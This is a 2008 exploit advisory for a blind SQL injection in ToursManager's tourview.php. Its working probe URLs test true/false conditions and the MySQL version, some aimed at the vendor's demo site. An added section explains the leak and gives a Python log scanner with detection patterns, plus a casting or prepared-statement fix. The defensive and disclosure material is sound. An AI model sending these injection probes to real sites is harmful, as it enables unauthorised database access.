ToursManager - 'tourview.php' Blind SQL Injection

EDB-ID: 7176
Author: XaDoS
Type: webapps
Platform: PHP
Published: 2008-11-20

[>] Name:-->           ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] ContacT m&:-->     xados[at]hotmail.it
 
[>] Site:-->           http://www.toursmanager.com
 
#########
 
[■] £XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
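The probes above are boolean-based: the same `tourid` value is sent twice with a condition that is true and then false, and the difference in the page that comes back leaks one bit per request (here, whether the first character of `@@version` is 5). From the defender's side that pattern is visible in the web server access log: a parameter that should be a plain integer suddenly carries `and 1=1--`, `and 1=0--` or `substring(@@version...)`, often as a true/false pair from one client with different response sizes. The scanner below is an added example, not part of the advisory or of ToursManager; it runs over constructed Apache-style log lines (not real traffic) and assumes the script name `/tourview.php` and parameter `tourid` from the advisory.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample Apache combined-log lines (not taken from the advisory).
# The request shapes mirror the true/false and version probes described above.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Nov/2008:10:01:02 +0000] "GET /tourview.php?tourid=2 HTTP/1.1" 200 5120
203.0.113.5 - - [20/Nov/2008:10:01:09 +0000] "GET /tourview.php?tourid=2%20and%201=1-- HTTP/1.1" 200 5120
203.0.113.5 - - [20/Nov/2008:10:01:11 +0000] "GET /tourview.php?tourid=2%20and%201=0-- HTTP/1.1" 200 402
203.0.113.5 - - [20/Nov/2008:10:01:20 +0000] "GET /tourview.php?tourid=2+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.7 - - [20/Nov/2008:10:02:00 +0000] "GET /tourview.php?tourid=17 HTTP/1.1" 200 4890
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Indicators checked against the URL-decoded parameter value. These are the
# shapes the advisory's probes take; classify_param() additionally flags any
# value that is not the plain integer id the application expects.
INDICATORS = [
    ("boolean-tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("version-probe", re.compile(r"substring\s*\(\s*@@version", re.I)),
    ("comment-terminator", re.compile(r"(?:--|#)\s*$")),
]


def decode_query(query):
    """Split a raw query string into {name: decoded value}.

    Each pair is split on its first '=' only, so a '1=1' inside a value
    survives intact; '+' and %XX escapes are decoded the way PHP would see them.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(raw)
    return params


def classify_param(value):
    """Return the indicator names that fire for one decoded parameter value."""
    hits = [name for name, rx in INDICATORS if rx.search(value)]
    if not value.strip().isdigit():
        hits.append("non-integer-id")
    return hits


def scan_log(text, script="/tourview.php", param="tourid"):
    """Return one finding per request to `script` whose `param` looks injected."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != script:
            continue
        value = decode_query(url.query).get(param)
        if value is None:
            continue
        hits = classify_param(value)
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "value": value,
                "size": m.group("size"),   # differing sizes for a true/false pair are the leak channel
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} tourid={f['value']!r} size={f['size']} -> {', '.join(f['indicators'])}")
```

The `non-integer-id` check is the one that matters most in practice: a numeric id parameter that contains anything but digits is wrong regardless of which SQL keywords appear, so it catches probes the keyword patterns miss. The same observation is the fix on the application side: cast `tourid` to an integer (or bind it as a parameter in a prepared statement) before it reaches the query.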
 
#########
[■] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 
[■] Th4Nks T0:
 
> Boom3rang </ (very kind) ;-)
> Langy  </
> Str0ke </
 
#########

# milw0rm.com [2008-11-20]